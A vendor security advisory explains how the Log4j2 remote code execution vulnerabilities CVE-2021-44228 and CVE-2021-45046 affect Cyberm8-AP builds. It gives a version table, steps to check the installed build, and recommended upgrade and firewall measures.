Apache Log4j2 Remote Code Execution vulnerability CVE-2021-44228, CVE-2021-45046

You are here:
Table of Contents

Security Advisory Description

Apache Log4j is a Java-based logging utility and is part of the Apache Logging Services project of the Apache Software Foundation. On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2 was identified being exploited in the wild (CVE-2021-44228). By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker can instruct that system to download and subsequently execute a malicious payload.

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
(Source: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046)

Impact on Cyberm8-AP

Our research team has verified that the following Cyberm8-AP includes the vulnerable version of the Log4j:

Cyberm8-AP Version: Vulnerability: Severity: Recommendation:
Versions earlier than 3.0.0 Build 570 Not Vulnerable N/A
v3.0.0 Build 570 to v3.0.0 Build 577   Vulnerable to: CVE-2021-44228, CVE-2021-45046Critical Follow “Recommended Actions”
v3.0.0 Build 581 Vulnerable to: CVE-2021-45046Low Follow “Recommended Actions”
v3.0.0 Build 605 Not Vulnerable N/A

* Though versions v3.0.0 Build 570 to Build 581 are vulnerable, to utilize the vulnerability a specific non-default configuration must exist on the device, and the attacker must be an authenticated user or an approved source of Syslog/Mail notifications.

How to Verify

Using the WebUI:
1. Login to Cyberm8-AP WebUI as an administrator.
2. Verify the version and build number on the bottom of the left (main) menu.

Using the Shell:
1. Login to Cyberm8-AP shell.
2. Run the following command: ‘csh version’ to verify the version and build numbers.

Recommended Actions

  1. Upgrade Cyberm8-AP to the latest invulnerable version (3.0.0 build 605).
  2. Maintain an updated access list of authorized sources to send syslog/mail triggers to Cyberm8-AP on your network firewalls.
  3. Maintain an updated access list of allowed outbound communication from Cyberm8-AP to desired targets on your network firewalls.
  4. Prevent unauthorized network access to Cyberm8-AP management interface.